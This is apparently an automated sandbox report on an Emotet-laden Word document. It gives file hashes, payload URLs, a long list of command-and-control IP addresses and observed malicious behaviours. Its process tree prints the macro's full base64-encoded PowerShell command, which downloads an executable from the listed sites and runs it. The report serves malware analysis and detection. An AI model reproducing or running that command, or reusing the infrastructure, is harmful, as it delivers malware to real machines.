Analysis
-
max time kernel
143s -
max time network
151s -
platform
windows10_x64 -
resource
win10v200722 -
submitted
02-08-2020 07:36
Static task
static1
Behavioral task
behavioral1
Sample
SecuriteInfo.com.Exploit.Siggen2.13694.14795.18048.doc
Resource
win7
General
-
Target
SecuriteInfo.com.Exploit.Siggen2.13694.14795.18048.doc
-
Size
168KB
-
MD5
99fb1033909db6b78ec2162ec3a2c9ab
-
SHA1
e10742dd869b2571b54fbb908b522b8fae2cc328
-
SHA256
92a8c9729a35ef4fbe97b8b931ac2ba3284ff4c1aaaab30eadbe36ad12c75465
-
SHA512
26f9db7838e4ec8c247a59411730c32d7b61361b3a435e80d103b65141d71693287418d739d24e8ffe24a45eaa383e4b7f226a371dba1183693857c419d00f78
Malware Config
Extracted
http://rectificadoscarrion.com/wp-includes/EiQ/
http://renekok.com/QbWyat/
http://www.onlinemediadesigns.com/bin/nObh/
http://renegaderadio.net/haunted/cA5zuC5/
http://qatifsport.net/t/NbQq254/
Extracted
emotet
73.116.193.136:80
185.94.252.13:443
149.62.173.247:8080
89.32.150.160:8080
185.94.252.12:80
77.90.136.129:8080
83.169.21.32:7080
104.236.161.64:8080
114.109.179.60:80
189.2.177.210:443
68.183.190.199:8080
144.139.91.187:443
185.94.252.27:443
190.181.235.46:80
82.196.15.205:8080
46.28.111.142:7080
181.167.96.215:80
202.62.39.111:80
219.92.13.25:80
191.99.160.58:80
50.28.51.143:8080
172.104.169.32:8080
192.241.146.84:8080
82.240.207.95:443
80.249.176.206:80
2.47.112.152:80
212.231.60.98:80
77.55.211.77:8080
170.81.48.2:80
5.196.35.138:7080
143.0.87.101:80
190.6.193.152:8080
217.199.160.224:7080
187.162.248.237:80
93.151.186.85:80
177.74.228.34:80
204.225.249.100:7080
217.13.106.14:8080
51.255.165.160:8080
104.131.103.37:8080
177.72.13.80:80
190.163.31.26:80
186.70.127.199:8090
61.92.159.208:8080
12.162.84.2:8080
71.50.31.38:80
186.250.52.226:8080
92.23.34.86:80
177.144.135.2:80
201.213.156.176:80
190.147.137.153:443
94.176.234.118:443
181.129.96.162:8080
178.79.163.131:8080
111.67.12.221:8080
177.66.190.130:80
191.182.6.118:80
68.183.170.114:8080
177.73.0.98:443
203.25.159.3:8080
45.161.242.102:80
181.120.79.227:80
72.47.248.48:7080
177.139.131.143:443
189.194.58.119:80
137.74.106.111:7080
189.1.185.98:8080
190.194.242.254:443
190.17.195.202:80
192.241.143.52:8080
87.106.46.107:8080
212.71.237.140:8080
179.60.229.168:443
70.32.84.74:8080
70.32.115.157:8080
104.131.41.185:8080
Signatures
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powersheLL.exedescription pid process Token: SeDebugPrivilege 4020 powersheLL.exe -
Executes dropped EXE 2 IoCs
Processes:
285.exeieUnatt.exepid process 3992 285.exe 3924 ieUnatt.exe -
Emotet Payload 4 IoCs
Detects Emotet payload in memory.
Processes:
resource yara_rule behavioral2/memory/3992-9-0x00000000005B0000-0x00000000005BC000-memory.dmp emotet behavioral2/memory/3992-9-0x00000000005B0000-0x00000000005BC000-memory.dmp emotet behavioral2/memory/3924-12-0x0000000000500000-0x000000000050C000-memory.dmp emotet behavioral2/memory/3924-12-0x0000000000500000-0x000000000050C000-memory.dmp emotet -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Suspicious use of SetWindowsHookEx 11 IoCs
Processes:
WINWORD.EXE285.exeieUnatt.exepid process 496 WINWORD.EXE 496 WINWORD.EXE 496 WINWORD.EXE 496 WINWORD.EXE 496 WINWORD.EXE 496 WINWORD.EXE 496 WINWORD.EXE 496 WINWORD.EXE 496 WINWORD.EXE 3992 285.exe 3924 ieUnatt.exe -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 496 WINWORD.EXE 496 WINWORD.EXE -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powersheLL.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4020 800 powersheLL.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
powersheLL.exeieUnatt.exepid process 4020 powersheLL.exe 4020 powersheLL.exe 4020 powersheLL.exe 3924 ieUnatt.exe 3924 ieUnatt.exe 3924 ieUnatt.exe 3924 ieUnatt.exe 3924 ieUnatt.exe 3924 ieUnatt.exe -
Blacklisted process makes network request 1 IoCs
Processes:
powersheLL.exeflow pid process 22 4020 powersheLL.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
285.exedescription pid process target process PID 3992 wrote to memory of 3924 3992 285.exe ieUnatt.exe PID 3992 wrote to memory of 3924 3992 285.exe ieUnatt.exe PID 3992 wrote to memory of 3924 3992 285.exe ieUnatt.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Drops file in System32 directory 1 IoCs
Processes:
285.exedescription ioc process File opened for modification C:\Windows\SysWOW64\adsmsext\ieUnatt.exe 285.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Exploit.Siggen2.13694.14795.18048.doc" /o ""1⤵
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: AddClipboardFormatListener
- Enumerates system info in registry
-
C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exepowersheLL -e JABUAFUATwBPAEYAagBqAGQAPQAnAEoARQBPAFUAUwBkAGUAawAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAARQBDAFUAUgBpAHQAeQBQAGAAUgBvAFQAbwBDAE8AbAAiACAAPQAgACcAdABsAHMAMQAyACwAIAB0AGwAcwAxADEALAAgAHQAbABzACcAOwAkAEMAVQBaAFEAWgB0AHkAYQAgAD0AIAAnADIAOAA1ACcAOwAkAE4ASQBCAEMAQwBvAHMAdgA9ACcASgBPAEYASwBIAHAAdABvACcAOwAkAEcARwBNAEIAUQBiAHkAaQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAQwBVAFoAUQBaAHQAeQBhACsAJwAuAGUAeABlACcAOwAkAFMAQgBDAFMATQBmAG8AZAA9ACcASQBCAFYATABPAG0AcABuACcAOwAkAE4AVwBEAEcATAB4AHIAbwA9AC4AKAAnAG4AZQB3ACcAKwAnAC0AbwBiAGoAJwArACcAZQBjAHQAJwApACAATgBlAHQALgBXAEUAYgBjAGwASQBFAG4AVAA7ACQATwBaAEQAQQBLAGcAdgBwAD0AJwBoAHQAdABwADoALwAvAHIAZQBjAHQAaQBmAGkAYwBhAGQAbwBzAGMAYQByAHIAaQBvAG4ALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAEUAaQBRAC8AKgBoAHQAdABwADoALwAvAHIAZQBuAGUAawBvAGsALgBjAG8AbQAvAFEAYgBXAHkAYQB0AC8AKgBoAHQAdABwADoALwAvAHcAdwB3AC4AbwBuAGwAaQBuAGUAbQBlAGQAaQBhAGQAZQBzAGkAZwBuAHMALgBjAG8AbQAvAGIAaQBuAC8AbgBPAGIAaAAvACoAaAB0AHQAcAA6AC8ALwByAGUAbgBlAGcAYQBkAGUAcgBhAGQAaQBvAC4AbgBlAHQALwBoAGEAdQBuAHQAZQBkAC8AYwBBADUAegB1AEMANQAvACoAaAB0AHQAcAA6AC8ALwBxAGEAdABpAGYAcwBwAG8AcgB0AC4AbgBlAHQALwB0AC8ATgBiAFEAcQAyADUANAAvACcALgAiAHMAcABgAGwASQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAUwBTAE0AQQBOAG8AYwB1AD0AJwBEAFQARwBGAFoAcABhAHMAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFoATgBaAEkASQBpAG4AaQAgAGkAbgAgACQATwBaAEQAQQBLAGcAdgBwACkAewB0AHIAeQB7ACQATgBXAEQARwBMAHgAcgBvAC4AIgBEAE8AdwBuAGAAbABgAE8AYABBAGQAZgBJAGwAZQAiACgAJABaAE4AWgBJAEkAaQBuAGkALAAgACQARwBHAE0AQgBRAGIAeQBpACkAOwAkAEYAVgBWAFYATgB5AGsAawA9ACcASwBYAEEAVABVAHUAZQBiACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlAHQALQBJAHQAZQAnACsAJwBtACcAKQAgACQARwBHAE0AQgBRAGIAeQBpACkALgAiAGwARQBgAE4AZwBUAEgAIgAgAC0AZwBlACAAMwA2ADkANQA3ACkAIAB7ACgAWwB3AG0AaQBjAGwAYQBzAHMAXQAnAHcAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMAJwApAC4AIgBDAFIAYABlAGEAYABUAEUAIgAoACQARwBHAE0AQgBRAGIAeQBpACkAOwAkAFMATgBPAFEAUwB5AGsAagA9ACcAQwBDAEcATABWAGcAawBzACcAOwBiAHIAZQBhAGsAOwAkAFcARQBPAFAARAB2AHIAeAA9ACcASwBZAE0AQQBYAHQAagBhACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFEARgBEAFcARABvAG4AaAA9ACcARQBNAEUATgBLAGIAcQBmACcA1⤵
- Suspicious use of AdjustPrivilegeToken
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
-
C:\Users\Admin\285.exeC:\Users\Admin\285.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- Drops file in System32 directory
-
C:\Windows\SysWOW64\adsmsext\ieUnatt.exe"C:\Windows\SysWOW64\adsmsext\ieUnatt.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\285.exe
-
C:\Users\Admin\285.exe
-
C:\Windows\SysWOW64\adsmsext\ieUnatt.exe
-
memory/3924-10-0x0000000000000000-mapping.dmp
-
memory/3924-12-0x0000000000500000-0x000000000050C000-memory.dmpFilesize
48KB
-
memory/3992-9-0x00000000005B0000-0x00000000005BC000-memory.dmpFilesize
48KB